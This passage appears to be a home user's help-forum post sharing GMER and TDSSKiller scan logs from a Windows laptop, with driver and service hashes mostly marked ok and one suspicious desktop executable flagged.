Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:9532]                                                                        000000006a8c9af7
Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:908]                                                                         000000006a8c9af7
Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:8904]                                                                        0000000077bb5087
Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:4252]                                                                        0000000077bb5087
---- Processes - GMER 2.1 ----

Process  C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe (*** suspicious ***) @ C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe [4552](2014-10-14 19  0000000000400000

---- Disk sectors - GMER 2.1 ----

Disk     \Device\Harddisk0\DR0                                                                                                                      unknown MBR code

---- EOF - GMER 2.1 ----

  Finally, here is the TDSSkiller log.  I remember running this about three weeks ago and I did delete or quarantine the threats it found.  So no surprise that no threats found this time.  I don't think I kept that log, but I'll noodle around and see if I can find it. 

20:46:04.0225 0x1d4c  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
20:46:04.0225 0x1d4c  UEFI system
20:46:14.0989 0x1d4c  ============================================================
20:46:14.0989 0x1d4c  Current date / time: 2014/10/14 20:46:14.0989
20:46:14.0989 0x1d4c  SystemInfo:
20:46:14.0989 0x1d4c  
20:46:14.0989 0x1d4c  OS Version: 6.2.9200 ServicePack: 0.0
20:46:14.0989 0x1d4c  Product type: Workstation
20:46:14.0989 0x1d4c  ComputerName: TOSHIBA_LAPTOP
20:46:14.0989 0x1d4c  UserName: Jeremy and Heidi
20:46:14.0989 0x1d4c  Windows directory: C:\windows
20:46:14.0989 0x1d4c  System windows directory: C:\windows
20:46:14.0989 0x1d4c  Running under WOW64
20:46:14.0989 0x1d4c  Processor architecture: Intel x64
20:46:14.0989 0x1d4c  Number of processors: 2
20:46:14.0989 0x1d4c  Page size: 0x1000
20:46:14.0989 0x1d4c  Boot type: Normal boot
20:46:14.0989 0x1d4c  ============================================================
20:46:31.0514 0x1d4c  KLMD registered as C:\windows\system32\drivers\88081295.sys
20:46:31.0880 0x1d4c  System UUID: {4C260FA8-9060-F30C-8C83-35C78A02E44B}
20:46:32.0488 0x1d4c  Drive \Device\Harddisk0\DR0 - Size: 0x950B056000 ( 596.17 Gb ), SectorSize: 0x200, Cylinders: 0x13001, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
20:46:32.0488 0x1d4c  ============================================================
20:46:32.0488 0x1d4c  \Device\Harddisk0\DR0:
20:46:32.0488 0x1d4c  GPT partitions:
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition1: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {B6F7492D-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0x800, BlocksNum 0xE1000
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition2: GPT, TypeGUID: {C12A7328-F81F-11D2-BA4B-00A0C93EC93B}, UniqueGUID: {B6F74935-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0xE1800, BlocksNum 0x82000
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition3: GPT, TypeGUID: {E3C9E316-0B5C-4DB8-817D-F92DF00215AE}, UniqueGUID: {B6F74937-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0x163800, BlocksNum 0x40000
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition4: GPT, TypeGUID: {EBD0A0A2-B9E5-4433-87C0-68B6B72699C7}, UniqueGUID: {B6F7493F-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0x1A3800, BlocksNum 0x493FD800
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition5: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {C8FB6A2F-CED5-4CB3-9FF5-F5BB481EEFD3}, Name: Basic data partition, StartLBA 0x495A1000, BlocksNum 0x12B7000
20:46:32.0504 0x1d4c  MBR partitions:
20:46:32.0504 0x1d4c  ============================================================
20:46:32.0535 0x1d4c  C: <-> \Device\Harddisk0\DR0\Partition4
20:46:32.0535 0x1d4c  ============================================================
20:46:32.0535 0x1d4c  Initialize success
20:46:32.0535 0x1d4c  ============================================================
20:46:58.0838 0x1e50  ============================================================
20:46:58.0838 0x1e50  Scan started
20:46:58.0838 0x1e50  Mode: Manual; 
20:46:58.0838 0x1e50  ============================================================
20:46:58.0838 0x1e50  KSN ping started
20:47:01.0339 0x1e50  KSN ping finished: true
20:47:03.0262 0x1e50  ================ Scan system memory ========================
20:47:03.0262 0x1e50  System memory - ok
20:47:03.0262 0x1e50  ================ Scan services =============================
20:47:03.0450 0x1e50  [ E890C46E4754F0DF51BAFCC8D2E07498, E620D03030F3B65442E0A5CB8B59016A6E8DB3BCA52741977B8897B34438E902 ] 1394ohci        C:\windows\System32\drivers\1394ohci.sys
20:47:03.0450 0x1e50  1394ohci - ok
20:47:03.0496 0x1e50  [ 4F18D4C7EA14F11A7211F60D553C03DB, 09AB6D2D8E9B7B6D6A97708551C0E4B34538947A15EA2A69C11764D7BC0BB7F6 ] 3ware           C:\windows\system32\drivers\3ware.sys
20:47:03.0512 0x1e50  3ware - ok
20:47:03.0657 0x1e50  [ 73C035299E3044636104CA7A7634A6AC, ED1D4904E2D1D1C72ED9697297AE1B64860098BA2F6F63F7A1426413007DF138 ] a2acc           C:\PROGRAM FILES (X86)\EMSISOFT ANTI-MALWARE\a2accx64.sys
20:47:03.0657 0x1e50  a2acc - ok
20:47:03.0845 0x1e50  [ 5E65B8C0E1AAE00E749BA4AC3B88E854, D641DDD1B14AED7FD1FB8D2B27BAC80548DF6D89A44FD57244FBAFC6F448BA37 ] a2AntiMalware   C:\Program Files (x86)\Emsisoft Anti-Malware\a2service.exe
20:47:03.0969 0x1e50  a2AntiMalware - ok
20:47:04.0016 0x1e50  [ D27A8B7BB0E15DFBFC6B4E774EE17AD9, CBAD45B3FFFD30C34AF918009F699B65F89043D0799FC25D2472381912F86F93 ] A2DDA           C:\Program Files (x86)\Emsisoft Anti-Malware\a2ddax64.sys
20:47:04.0016 0x1e50  A2DDA - ok
20:47:04.0032 0x1e50  [ 05936579605018BD2BC528FF2C1AD95F, 763C2E76F9078F6A74D5BCCB4DD8A10C82AEB9C9F5A45C3706A587FA2D03E7D3 ] a2injectiondriver C:\Program Files (x86)\Emsisoft Anti-Malware\a2dix64.sys
20:47:04.0032 0x1e50  a2injectiondriver - ok
20:47:04.0047 0x1e50  [ B1AB7116D14667A2238DAEFE20B7F4D0, DC8A9093A6F759657C3354931A462FCCAF3533A907FB7152380EB2E9B4AD3BF8 ] a2util          C:\Program Files (x86)\Emsisoft Anti-Malware\a2util64.sys
20:47:04.0047 0x1e50  a2util - ok
20:47:04.0094 0x1e50  [ 975AABEB243B800C23626D6B652C5A9C, FB02336F26AF10BA2A0D1B97C33CB1D78BB90CA51EF008A613A0274779798FAD ] ACPI            C:\windows\system32\drivers\ACPI.sys
20:47:04.0110 0x1e50  ACPI - ok
20:47:04.0141 0x1e50  [ DC968C37822117E576B933F34A2D130C, 4C94E00ADC242296D7CBBFC7346D5F9AE5FE1B0C616ECA3BDE10A7B34FD2040B ] acpiex          C:\windows\system32\Drivers\acpiex.sys
20:47:04.0141 0x1e50  acpiex - ok
20:47:04.0157 0x1e50  [ 0CA9F7C3A78227C21A0A7854E245CFB2, D54147C9C1EE2F0098B863B0852E027DB89D6FA67F6B7FD54F609D9715A11442 ] acpipagr        C:\windows\System32\drivers\acpipagr.sys
20:47:04.0157 0x1e50  acpipagr - ok
20:47:04.0172 0x1e50  [ 8EB8DA03B142D3DD1EB9ED8107A76C43, 24B9B24F9A5BDF3AAD13C4EE0638497D9CA4A100096C6EAE403E0215EA89C439 ] AcpiPmi         C:\windows\System32\drivers\acpipmi.sys
20:47:04.0188 0x1e50  AcpiPmi - ok
20:47:04.0203 0x1e50  [ CBCE725C5D86ABA7D2604E22951AA9B8, DE0440F0E943F057EBCD01DB4B1E12DBC241FBF03C42021306D322AB88FF8F21 ] acpitime        C:\windows\System32\drivers\acpitime.sys
20:47:04.0203 0x1e50  acpitime - ok
20:47:04.0250 0x1e50  [ 62B7936F9036DD6ED36E6A7EFA805DC0, C58EA1B46CB3595386C9217A7785F2A436916FB1E0BDC0E4BE484292C55AA455 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
20:47:04.0250 0x1e50  AdobeARMservice - ok
20:47:04.0297 0x1e50  [ 93C6388592B99925C1D1576E465BC80F, 4C48BE5471DA4788357D71E90DFEA20FE320C7AAE1F4C55AFBE2E46FEA5CF8FB ] adp94xx         C:\windows\system32\drivers\adp94xx.sys
20:47:04.0313 0x1e50  adp94xx - ok
20:47:04.0344 0x1e50  [ D27763E0247292654E7F7D16444C7C72, 0314C713D31E2B34F215B52F804F014D876E6ED92DC656CC3E27920CCD36CF0E ] adpahci         C:\windows\system32\drivers\adpahci.sys
20:47:04.0359 0x1e50  adpahci - ok
20:47:04.0375 0x1e50  [ 67B90070FF48F794AF19F9FCF0080D75, 5D0D352606D58D2CA0814F38EF7B1774C030BE44353DF5910CBFAAF4FDE64ED6 ] adpu320         C:\windows\system32\drivers\adpu320.sys
20:47:04.0391 0x1e50  adpu320 - ok
20:47:04.0437 0x1e50  [ 974AE60BF5B90E31412D93596C968E5B, 092B59C2B67C4618E7B1800615D1DF7199482F60D0D27BD91763F7F8D7FC883F ] AeLookupSvc     C:\windows\System32\aelupsvc.dll
20:47:04.0437 0x1e50  AeLookupSvc - ok
20:47:04.0500 0x1e50  [ FE7FB9612D354EB41DF4F0FF5D6FB259, 98D5BD9C1300195C49CB0717A831A06D99F7AE631D5EA065E10BFE7C2FA57A18 ] AFD             C:\windows\system32\drivers\afd.sys
20:47:04.0515 0x1e50  AFD - ok
20:47:04.0547 0x1e50  [ 01590377A5AB19E792528C628A2A68F9, F3A4B6CA4E8D4436E44E36D7F7EEF3DC861D1EE50D41F4273226C4ED95674B84 ] agp440          C:\windows\system32\drivers\agp440.sys
20:47:04.0547 0x1e50  agp440 - ok
20:47:04.0578 0x1e50  [ D1BE8E6E5B3AF23A4393AF1BF867977A, B3AE97D35A9304198715D76F6C3F0545AA176FDEBA6C2055782558B11DFA14EB ] ALG             C:\windows\System32\alg.exe
20:47:04.0578 0x1e50  ALG - ok
20:47:04.0609 0x1e50  [ 025E8C755BE293E50854D26D1BBE5133, 4373639689306A3D8FE0F862072711BAD5DBAA45E105CD3129586439A90EE070 ] AllUserInstallAgent C:\windows\system32\AUInstallAgent.dll
20:47:04.0609 0x1e50  AllUserInstallAgent - ok
20:47:04.0656 0x1e50  [ 4EAAAAB8759644D572522FBCDD196A13, EF1ECE8073B048C2286F639BA76C523B6B267B64447358383C042BD593194350 ] AMD External Events Utility C:\windows\system32\atiesrxx.exe
20:47:04.0671 0x1e50  AMD External Events Utility - ok
20:47:04.0718 0x1e50  [ 5A81054B824004B1ECC04F0034A1CDF9, 73A1986A4B346C425157216EBF16CC90EFFC642EDF6109E6364CF0552E3388FD ] AmdK8           C:\windows\System32\drivers\amdk8.sys
20:47:04.0718 0x1e50  AmdK8 - ok
20:47:05.0217 0x1e50  [ 22A14DF59FB8D0BE918C597988AF4296, 714BD1BB63D732C6D03DFA1C2D81A2E00659C04052E110F0BF1EB74A7CD39B1C ] amdkmdag        C:\windows\system32\DRIVERS\atikmdag.sys
20:47:05.0483 0x1e50  amdkmdag - ok
20:47:05.0561 0x1e50  [ EE22D3ED6D55A855E709F811CCCA97ED, 179F34CF6E0C2F821EBC0AECF09AAA0867616CCBB5EA6B17891860B27D56AC66 ] amdkmdap        C:\windows\system32\DRIVERS\atikmpag.sys
20:47:05.0579 0x1e50  amdkmdap - ok
20:47:05.0628 0x1e50  [ B849D453E644FAB9BC8EF6DC8CA9C4C6, B803CDA478D3385937C44CBB05A0E65ABACEFEBA682975787C44E2904FB89D2D ] AmdPPM          C:\windows\System32\drivers\amdppm.sys
20:47:05.0628 0x1e50  AmdPPM - ok
20:47:05.0659 0x1e50  [ 35A0EB5AECB0FA3C41A2FB514A562304, 737783ABF348288471AC7051D4DC6CB336D686C94EC7B8938DCA74AFE9BECB1C ] amdsata         C:\windows\system32\drivers\amdsata.sys
20:47:05.0659 0x1e50  amdsata - ok
20:47:05.0690 0x1e50  [ 00452671904F5EE94B50BF0219C97164, 99F9B86D3DB3E10B014120A63CD43CBAAB22C8E38851090ABE37D89ABD61F7B6 ] amdsbs          C:\windows\system32\drivers\amdsbs.sys
20:47:05.0690 0x1e50  amdsbs - ok
20:47:05.0706 0x1e50  [ EA3FFE53E92E59C87E3ECA9BEB20D9B7, DC0B8B798720F5F75F8AFD3383CF69194282AEEE84DCACB97382F4C86E1D3E49 ] amdxata         C:\windows\system32\drivers\amdxata.sys
20:47:05.0706 0x1e50  amdxata - ok
20:47:05.0737 0x1e50  [ 83B3682CE922FB0F415734B26D9D6233, 9102E8B410BB1AE426770896B6AB584D1F02830337FBB2DEC182F3F19832F35F ] AppID           C:\windows\system32\drivers\appid.sys
20:47:05.0737 0x1e50  AppID - ok
20:47:05.0768 0x1e50  [ CE2BEAD7F31816FF0AC490D048C969F9, 7D24C5A9E8F7C21CC6D8BF2CA29A8B79DDE7EEDE2F37D36B9071ECE1CF61371F ] AppIDSvc        C:\windows\System32\appidsvc.dll
20:47:05.0768 0x1e50  AppIDSvc - ok
20:47:05.0815 0x1e50  [ 4F750B7EFCB6520AE01E01D082D7D476, AD2A67D727A1D4DD0BBACC6B4BB432FA9A14D50D8BA292B95A4747CEC9F85728 ] Appinfo         C:\windows\System32\appinfo.dll
20:47:05.0815 0x1e50  Appinfo - ok
20:47:05.0862 0x1e50  [ 221564CC7BE37611FE15EACF443E1BF6, 381BDF17418C779D72332431BA174C2AD76CD9C7C1711FF5142EA9B05D5555E4 ] Apple Mobile Device C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
20:47:05.0862 0x1e50  Apple Mobile Device - ok
20:47:05.0893 0x1e50  [ 44695679881DEB85CAD7C249B151066E, A44413ACA911DDB5757DE9F9ECC3968979C47617CF9DF81B24E7ECDE7E0D54BC ] APXACC          C:\windows\system32\DRIVERS\appexDrv.sys
20:47:05.0893 0x1e50  APXACC - ok
20:47:05.0940 0x1e50  [ E933401B392387F4BE34DE8BAF1722A7, 57CC6DE31E2C82D2B12509F0A5EC9EC70DD2EF6A1F31A66ADF62DC6AE0A67323 ] arc             C:\windows\system32\drivers\arc.sys
20:47:05.0940 0x1e50  arc - ok
20:47:05.0956 0x1e50  [ 07CA323EF2E8247A568AB0F3662AD644, 1224B41193F0E9B164732BA5BF707A13427C82C1D8C3EDC2AAE5C5C75454B9F6 ] arcsas          C:\windows\system32\drivers\arcsas.sys
20:47:05.0956 0x1e50  arcsas - ok
20:47:05.0987 0x1e50  [ 74DBAEC35366C4EE7670428808715A6A, 3B3A7A81CD8038C4750560B94A9247C4409410780B312BA71EDF2E393DCA7474 ] AsyncMac        C:\windows\system32\DRIVERS\asyncmac.sys
20:47:05.0987 0x1e50  AsyncMac - ok
20:47:06.0002 0x1e50  [ A721FF570C2387E383BDDEA9632863C9, 45DD7787F44A2C742560FEB03AB66910C2F0002D95BB02C55EEDE973AA92AD24 ] atapi           C:\windows\system32\drivers\atapi.sys
20:47:06.0002 0x1e50  atapi - ok
20:47:06.0127 0x1e50  [ DECE3E2832F125A41A02FB59F4C54EEA, 2994024E5C295E9FDF4C6C0A8F2B17C07C158AD1567BEDA46A482C6C08F460BC ] athr            C:\windows\system32\DRIVERS\athrx.sys
20:47:06.0205 0x1e50  athr - ok
20:47:06.0236 0x1e50  [ 506907D2E7F3A5B67DBD39C00A788B7C, 618C91FB9F49C69F88A993F164D7E9E4B7CAD0F34DCF77CF0C6F259A28448171 ] AtiHDAudioService C:\windows\system32\drivers\AtihdW86.sys
20:47:06.0236 0x1e50  AtiHDAudioService - ok
20:47:06.0283 0x1e50  [ BCD7A47EF587DC00DD61D12D9C2D1E44, 95BC9AC8BA8A86DB5C7A6317002BD9872F193B401A0C58DF252DCF3D4A7541E2 ] AudioEndpointBuilder C:\windows\System32\AudioEndpointBuilder.dll
20:47:06.0299 0x1e50  AudioEndpointBuilder - ok
20:47:06.0361 0x1e50  [ 599B3F685A263A114FFAF3BE29C49C75, 579E9561BA8537888E061E303F3F89E2E6F8B8DED74369C3767DB10B35CD45E8 ] Audiosrv        C:\windows\System32\Audiosrv.dll
20:47:06.0377 0x1e50  Audiosrv - ok
20:47:06.0439 0x1e50  [ 4EB2E8EE8BA47B58E08B67139C31CB41, 196F759A2BC3E978C3FDB1E37E0D40D56D43CB0004D5333E787CD4727A46F06C ] Avgboota        C:\windows\system32\DRIVERS\avgboota.sys
20:47:06.0439 0x1e50  Avgboota - ok
20:47:06.0455 0x1e50  [ CDE60914D4ED81291F0CCFDB2CA311B9, 414D9BFF4E7DA17194695CB99B9E7F82C1616F4C228E6E9087208D290B9ED64D ] Avgdiska        C:\windows\system32\DRIVERS\avgdiska.sys
20:47:06.0470 0x1e50  Avgdiska - ok
20:47:06.0658 0x1e50  [ B6E2D865C5936A4FEE68F11E97DF6B82, 02807C38BF6DF72BF49636371BA9CDBC1C531C239DF26930F320ABD937AA1B9D ] AVGIDSAgent     C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
20:47:06.0720 0x1e50  AVGIDSAgent - ok
20:47:06.0782 0x1e50  [ E7E1A0AB30587BF3734A2EC66BBCE743, F2D662A2CC29B9B8C1D7AA3424CAAB18A78C60E9557D992EF14BC15DB1438B54 ] AVGIDSDriver    C:\windows\system32\DRIVERS\avgidsdrivera.sys
20:47:06.0782 0x1e50  AVGIDSDriver - ok
20:47:06.0845 0x1e50  [ B0E4A1F342A3F8B75C4A4ADB044761C9, 208D033EE04206FEDFC99102025A53D53EF2D3FB373882776DE43D663BE9A01B ] AVGIDSHA        C:\windows\system32\DRIVERS\avgidsha.sys
20:47:06.0845 0x1e50  AVGIDSHA - ok
20:47:06.0892 0x1e50  [ 5D115BF49AE159D4D7D1EBC640CB138F, F529FB749AB8098B657DEB4637B9B87FA2DE4806F37AC9257542B7E522BA487E ] Avgldx64        C:\windows\system32\DRIVERS\avgldx64.sys
20:47:06.0892 0x1e50  Avgldx64 - ok
20:47:06.0923 0x1e50  [ 197F28711B4B71E6575E5298CCEDC737, 16B7A9E59CA5EF8241029E16408CC1DD77004B195C9FE0677DE35A723FCA3DB4 ] Avgloga         C:\windows\system32\DRIVERS\avgloga.sys
20:47:06.0923 0x1e50  Avgloga - ok
20:47:06.0985 0x1e50  [ 22B257B0A8A83924CB96D1BA2A076C2F, BA1E33DC2D76F9347160E159BFB857E673222745409686E32E707EB2847A2520 ] Avgmfx64        C:\windows\system32\DRIVERS\avgmfx64.sys
20:47:06.0985 0x1e50  Avgmfx64 - ok
20:47:07.0016 0x1e50  [ C4F9056928B26BCAF15872E46B29184F, 0A1574937D120B8872947C4C68F1706BB9713B0D00AD62BE8082499C944114BA ] Avgrkx64        C:\windows\system32\DRIVERS\avgrkx64.sys
20:47:07.0016 0x1e50  Avgrkx64 - ok
20:47:07.0063 0x1e50  [ D7CBEEA4500BFDC63E99B06A1C512BE8, F8408E339AD022DD78D6C856A330F5A40CAF21F3B0C69FA352D66E3B8E75AA0F ] avgwd           C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
20:47:07.0079 0x1e50  avgwd - ok
20:47:07.0126 0x1e50  [ 382904E87741638CF051E2B0C62335C4, 63229883599A89354BF4ECC1FD197822FCB3797D1B1FDF29C8C3EEB92114D368 ] Avgwfpa         C:\windows\system32\DRIVERS\avgwfpa.sys
20:47:07.0141 0x1e50  Avgwfpa - ok
20:47:07.0188 0x1e50  [ 89491EF71D5EA011127832C588002853, 05620E4235956D8446FB9604F930738C8AA97E3A74C907E37F7CC08B8EDA0461 ] AxInstSV        C:\windows\System32\AxInstSV.dll
20:47:07.0188 0x1e50  AxInstSV - ok
20:47:07.0250 0x1e50  [ 87AB5BB072A3F128541D5B815F82FFDD, 186AF33D3DE90638C3E165CAC3DA17295E8A80CDB523F9BE4AF7D38CA6954905 ] b06bdrv         C:\windows\system32\drivers\bxvbda.sys
20:47:07.0266 0x1e50  b06bdrv - ok
20:47:07.0297 0x1e50  [ 81703BC5D68DEDBB086C2368FBE7B334, CFD4A55C8045C482F8D410514F3211AEFA00097AB395F5A04BFE983ED6254F6B ] BasicDisplay    C:\windows\System32\drivers\BasicDisplay.sys
20:47:07.0297 0x1e50  BasicDisplay - ok
20:47:07.0313 0x1e50  [ 5EC68164E14D25675C98BBB5F09E8606, 1D7EDB21C87039FC5F39F46460AD852BC4EC6B179B1C205D189DD3C397343435 ] BasicRender     C:\windows\System32\drivers\BasicRender.sys
20:47:07.0313 0x1e50  BasicRender - ok
20:47:07.0375 0x1e50  [ 89143A7BA7850F5C7E61B43BB44B6418, 00BB781DF87D4FF1BAFD318AFE237296B4F5925023BA4486405EC0A384C88D8F ] BDESVC          C:\windows\System32\bdesvc.dll
20:47:07.0375 0x1e50  BDESVC - ok
20:47:07.0406 0x1e50  [ 9E7AEA59776D904607985AFFE7E5E183, C3DB745A9F4DA7CB9628A7913DD52B2444B14FEB9D588FF6558CF52CEB8955EB ] Beep            C:\windows\system32\drivers\Beep.sys
20:47:07.0406 0x1e50  Beep - ok
20:47:07.0484 0x1e50  [ 53AA55632B94622F2DC3695E86EF9363, 9B5BB8EDA48A37AE97BCD42D83B25A6D10AA6231EABE745DCCE6D60E19094A6F ] BFE             C:\windows\System32\bfe.dll
20:47:07.0500 0x1e50  BFE - ok
20:47:07.0547 0x1e50  [ D598C44A7072D3108D8D8102EC5E07F7, D7472E9BAAB7B6E1D30F4E153412E2A16EE5C08DE2BF8BFF4D65089825226FE0 ] BITS            C:\windows\System32\qmgr.dll
20:47:07.0562 0x1e50  BITS - ok
20:47:07.0692 0x1e50  [ EBBCD5DFBB1DE70E8F4AF8FA59E401FD, 17BFFC5DF609CE3B2F0CAB4BD6C118608C66A3AD86116A47E90B2BB7D8954122 ] Bonjour Service C:\Program Files\Bonjour\mDNSResponder.exe
20:47:07.0708 0x1e50  Bonjour Service - ok
20:47:07.0739 0x1e50  [ B17AC10B47C7FCB44D22A1F06415840E, 990D6F629D93F4F913D218ACE5187A26DCB762BAFB2BB279CCE8CAF2755D85A5 ] bowser          C:\windows\system32\DRIVERS\bowser.sys
20:47:07.0739 0x1e50  bowser - ok
20:47:07.0786 0x1e50  [ 038FA1B55531E7020DB705B42FCCE373, 023E87E3204D64890D6FEA78E762E5BC5BD0A59325EBC264834727779EEEDBC5 ] BrokerInfrastructure C:\windows\System32\bisrv.dll
20:47:07.0786 0x1e50  BrokerInfrastructure - ok
20:47:07.0817 0x1e50  [ 310068BDA80B1D55C36580FD8A873FAF, A75412FF1F483461F526E9A359DCEECA5E683441514464D5ED82D1A9740D583E ] Browser         C:\windows\System32\browser.dll
20:47:07.0817 0x1e50  Browser - ok
20:47:07.0864 0x1e50  [ 6695200F455E251F0BCC9CE4D0978D59, 4DB2F967E449581A9330EF43E794B45B93581564B20C5B991FC1EC665A640D69 ] BthAvrcpTg      C:\windows\System32\drivers\BthAvrcpTg.sys
20:47:07.0864 0x1e50  BthAvrcpTg - ok
20:47:07.0911 0x1e50  [ A8B20D852B07AE19A13B5D47EC4E4C3B, 86571C9E2BA15BB169CAB2D24C4D0598154C02FD173638CAFC685A7F6B09472D ] BthEnum         C:\windows\System32\drivers\BthEnum.sys
20:47:07.0911 0x1e50  BthEnum - ok
20:47:07.0942 0x1e50  [ 616EB8748C988AEE98D93DA141C3D3B4, 15A055B0496BDB29CBCF6EEBF112D4BA1C7A2FF39124728830D0FD1FD7A404CB ] BthHFEnum       C:\windows\System32\drivers\bthhfenum.sys
20:47:07.0942 0x1e50  BthHFEnum - ok
20:47:07.0989 0x1e50  [ DCB4EBD928A6FB368BE6CAE522412DE1, 9E1345F29467054689B9F48B5CCB567760D36610A4EA9AF41B829EAD60347269 ] bthhfhid        C:\windows\System32\drivers\BthHFHid.sys
20:47:07.0989 0x1e50  bthhfhid - ok
20:47:08.0004 0x1e50  [ 033916CE8784A848B9A3D686B7F66D97, B4D0514D59646CF6B70D4FA488CF95C38EA38CC5C509329CC8753E897C640AFA ] BTHMODEM        C:\windows\System32\drivers\bthmodem.sys
20:47:08.0020 0x1e50  BTHMODEM - ok
20:47:08.0035 0x1e50  [ 091BB978E9504D0AD14586929431A957, ACED02B879026A228E35F40847C210BC30A5AFC948FFE922DB21663E4A8DFF1D ] BthPan          C:\windows\system32\DRIVERS\bthpan.sys
20:47:08.0035 0x1e50  BthPan - ok
20:47:08.0113 0x1e50  [ 13795CAA34239D97A7211E7F9D96E012, C4F3402B063A7CFCE386D1AE9255975A199164BA9E7DCDB6129725213A0642B1 ] BTHPORT         C:\windows\System32\Drivers\BTHport.sys
20:47:08.0145 0x1e50  BTHPORT - ok
20:47:08.0176 0x1e50  [ A4387C3D271959313E2577DB7BE8BA7A, C71474802102102EBE04DF036EEB2F5FB3380BE288E3842F19F234EFAE977D70 ] bthserv         C:\windows\system32\bthserv.dll
20:47:08.0176 0x1e50  bthserv - ok
20:47:08.0191 0x1e50  [ 1F715957F5236D30B6020A19A4271F6A, C06B637C2C6919E2DE1055AE249AE3EAF7B4890799F22BF5757CC10CEF145043 ] BTHUSB          C:\windows\System32\Drivers\BTHUSB.sys
20:47:08.0207 0x1e50  BTHUSB - ok
20:47:08.0238 0x1e50  [ 990B1BABE6E81FB18E65A87EBEFB1772, 1820D4AC57E1D4B7FB5AA89C277B16910ED73712878D2B43FE542CE16DFE16C3 ] cdfs            C:\windows\system32\DRIVERS\cdfs.sys
20:47:08.0238 0x1e50  cdfs - ok
20:47:08.0269 0x1e50  [ 339BFF85D788268752DA8C9644B188EE, C2279F1A39AED39865A5027D2FD087F8E82F3ED8C94BA4D922855B98E792AFC5 ] cdrom           C:\windows\System32\drivers\cdrom.sys
20:47:08.0269 0x1e50  cdrom - ok
20:47:08.0285 0x1e50  [ BAF8F0F55BC300E5F882E521F054E345, FB228DB18F2FA55D8BA35A7E6778EE5D2EB0C29D384F1A0A868F90AE706188D7 ] CertPropSvc     C:\windows\System32\certprop.dll
20:47:08.0301 0x1e50  CertPropSvc - ok
20:47:08.0332 0x1e50  [ F64B7D1A37CC1D5F421D5359EEC81E2E, 2B4879DD32B2C20B94847755E22B1BCBE2B567B3989C57A9BA2DD783307EFFDB ] circlass        C:\windows\System32\drivers\circlass.sys
20:47:08.0332 0x1e50  circlass - ok
20:47:08.0379 0x1e50  [ B794DCF38C965FA2F93C45A7C3D582C5, 0E483EAF835B85AA4B6F449F9BB68AF0A3EE4192D29CD72F4B812F1E4D9E9A7C ] cleanhlp        C:\Program Files (x86)\Emsisoft Anti-Malware\cleanhlp64.sys
20:47:08.0379 0x1e50  cleanhlp - ok
20:47:08.0441 0x1e50  [ 9905168708DB68849B879B5548F68AB3, B7A495E57B9398704988DC472126CBC5B8D76761A34F51732FBF6CC88E3AB79A ] CLFS            C:\windows\system32\drivers\CLFS.sys
20:47:08.0457 0x1e50  CLFS - ok
20:47:08.0488 0x1e50  [ 2DC8538A2260647484A6C921CA837313, 094059DD66B0C50A1CAE288F920107B0B6AD1AA5758284E35B92C131EDEA30EA ] CmBatt          C:\windows\System32\drivers\CmBatt.sys
20:47:08.0488 0x1e50  CmBatt - ok
20:47:08.0566 0x1e50  [ DBF9E5346431557BF56F41E7F8EC0DC1, D5FA34C873DA9BE40301D53198355556506AB5145B78B14D0AA88570A0058589 ] CNG             C:\windows\system32\Drivers\cng.sys
20:47:08.0582 0x1e50  CNG - ok
20:47:08.0613 0x1e50  [ 0E5B1E9E7122EDAAF1F6CE047965CA92, 803E585B92D1E2E5B6BF67BE511E88DC2629A12407C3E30F7AEFB544D390A9B8 ] CompositeBus    C:\windows\System32\drivers\CompositeBus.sys
20:47:08.0613 0x1e50  CompositeBus - ok
20:47:08.0628 0x1e50  COMSysApp - ok
20:47:08.0644 0x1e50  [ D9CB0782AF819548072AA45B70F8B22D, 04796F39ABB88759A534DE3D0C51F684BF2A8DE1F4028B657CCFDBDD39A6618C ] condrv          C:\windows\system32\drivers\condrv.sys
20:47:08.0644 0x1e50  condrv - ok
20:47:08.0706 0x1e50  [ 5CE2742F063731EC10C1B2EE386A2C08, 309919BDDD4649AFB95A99DCF8AFC3BAE10F9BC1E2819C0794CFD0F80682C223 ] CryptSvc        C:\windows\system32\cryptsvc.dll
20:47:08.0706 0x1e50  CryptSvc - ok
20:47:08.0753 0x1e50  [ FAEF4C245BE832DB41B15DAAC336AFB7, 1F8C98AB0DF4327FCB01FE0356025488E19B48A45FFFA50576B49A8587FAC42B ] dam             C:\windows\system32\drivers\dam.sys
20:47:08.0753 0x1e50  dam - ok
20:47:08.0816 0x1e50  [ 1EC6E533C954BDDF2A37E7851A7E58FD, C25936A7465B6A2B3D05D2FCB09D91ACC07CFE038A5E968C99CFA9D9F2967DD4 ] DcomLaunch      C:\windows\system32\rpcss.dll
20:47:08.0847 0x1e50  DcomLaunch - ok
20:47:08.0894 0x1e50  [ C8650D1F61149AA546BDBC99172EBBC1, D9592ED1B6F23B6EC76A0B93635B6E38702311B0A6982F0F9DEC37FCDAF1288B ] defragsvc       C:\windows\System32\defragsvc.dll
20:47:08.0894 0x1e50  defragsvc - ok
